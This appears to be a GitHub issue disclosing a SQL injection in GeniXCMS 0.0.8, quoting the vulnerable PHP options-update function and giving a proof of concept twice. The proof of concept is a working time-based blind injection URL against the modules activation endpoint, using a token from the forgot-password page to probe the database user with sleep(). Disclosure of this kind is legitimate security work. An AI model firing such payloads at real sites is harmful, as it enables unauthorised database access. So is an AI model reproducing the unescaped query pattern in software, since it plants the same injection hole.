public static function update($key, $val = '')
{
if (is_array($key)) {
foreach ($key as $k => $v) {
$post = Db::query("UPDATE `options` SET `value`='{$v}' WHERE `name` = '{$k}' LIMIT 1");
}
} else {
$post = Db::query("UPDATE `options` SET `value`='{$val}' WHERE `name` = '{$key}' LIMIT 1");
}
return $post;
}
POC:
first, access forgotpassword.php to get a token: token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm
then access: http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a
We'll find that the page sleep 2 seconds(because my mysql user is root), which proved the vulnerability exist.
The text was updated successfully, but these errors were encountered:
superfish9
changed the title
SQL Injection in Options.class.php
SQL Injection in Options.class.php through 0.0.8 version
Jan 19, 2017
GeniXCMS_v0.0.8/inc/lib/Mod.class.php
continue:
GeniXCMS_v0.0.8/inc/lib/Options.class.php
POC:
first, access forgotpassword.php to get a token:
token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tmthen access:
http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27aWe'll find that the page sleep 2 seconds(because my mysql user is root), which proved the vulnerability exist.
The text was updated successfully, but these errors were encountered: